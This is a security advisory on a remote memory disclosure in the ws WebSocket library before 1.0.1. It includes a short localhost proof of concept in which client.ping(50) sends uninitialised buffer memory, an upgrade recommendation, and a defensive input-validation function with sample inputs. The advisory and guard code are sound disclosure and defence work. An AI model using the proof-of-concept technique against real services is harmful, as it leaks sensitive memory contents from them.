Versions of ws prior to 1.0.1 are affected by a remote memory disclosure vulnerability.
In certain rare circumstances, applications which allow users to control the arguments of a client.ping() call will cause ws to send the contents of an allocated but non-zero-filled buffer to the server. This may disclose sensitive information that still exists in memory after previous use of the memory for other tasks.
Proof of Concept
var ws = require('ws')

// Local server and client so the ping/pong round trip can be observed
var server = new ws.Server({ port: 9000 })
var client = new ws('ws://localhost:9000')

client.on('open', function () {
  console.log('open')
  client.ping(50) // this sends a non-zeroed buffer of 50 bytes
  client.on('pong', function (data) {
    console.log('got pong')
    console.log(data) // Data from the client: the 50 bytes, echoed back by the server
  })
})
Recommendation
Update to version 1.0.1 or greater.
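As defence in depth alongside the upgrade, an application can refuse anything other than a string or Buffer before it reaches client.ping(). The following is an added example, not code from ws or from the original advisory; safePingPayload, checkAll, MAX_CONTROL_PAYLOAD and the sample request bodies are hypothetical names and constructed inputs.

```javascript
// Added example: application-side guard for user-controlled ping() arguments.
// safePingPayload and MAX_CONTROL_PAYLOAD are hypothetical names, not part of ws.
const MAX_CONTROL_PAYLOAD = 125 // RFC 6455: control frame payload limit in bytes

function describe (v) {
  return v === null ? 'null' : Array.isArray(v) ? 'array' : typeof v
}

function safePingPayload (input) {
  // Accept only text or an existing Buffer. A number must never reach ping(),
  // because affected versions treat it as an allocation size.
  var payload
  if (Buffer.isBuffer(input)) {
    payload = Buffer.from(input) // copy, so later caller mutations cannot alter the frame
  } else if (typeof input === 'string') {
    payload = Buffer.from(input, 'utf8')
  } else {
    throw new TypeError('ping payload must be a string or Buffer, got ' + describe(input))
  }
  if (payload.length > MAX_CONTROL_PAYLOAD) {
    throw new RangeError('ping payload exceeds ' + MAX_CONTROL_PAYLOAD + ' bytes')
  }
  return payload
}

// Run the guard over request bodies the way a JSON API would receive them.
function checkAll (bodies) {
  return bodies.map(function (raw) {
    try {
      var payload = safePingPayload(JSON.parse(raw).payload)
      return { ok: true, bytes: payload.length }
    } catch (err) {
      return { ok: false, reason: err.message }
    }
  })
}

// Constructed sample inputs: a normal string, a bare number (the case from the
// proof of concept), a JSON-serialized Buffer object, and an oversized string.
const SAMPLE_BODIES = [
  '{"payload":"keepalive"}',
  '{"payload":50}',
  '{"payload":{"type":"Buffer","data":[1,2,3]}}',
  '{"payload":"' + 'A'.repeat(200) + '"}'
]

console.log(checkAll(SAMPLE_BODIES))
```

At the call site this becomes client.ping(safePingPayload(userInput)), with the thrown error handled as a rejected request.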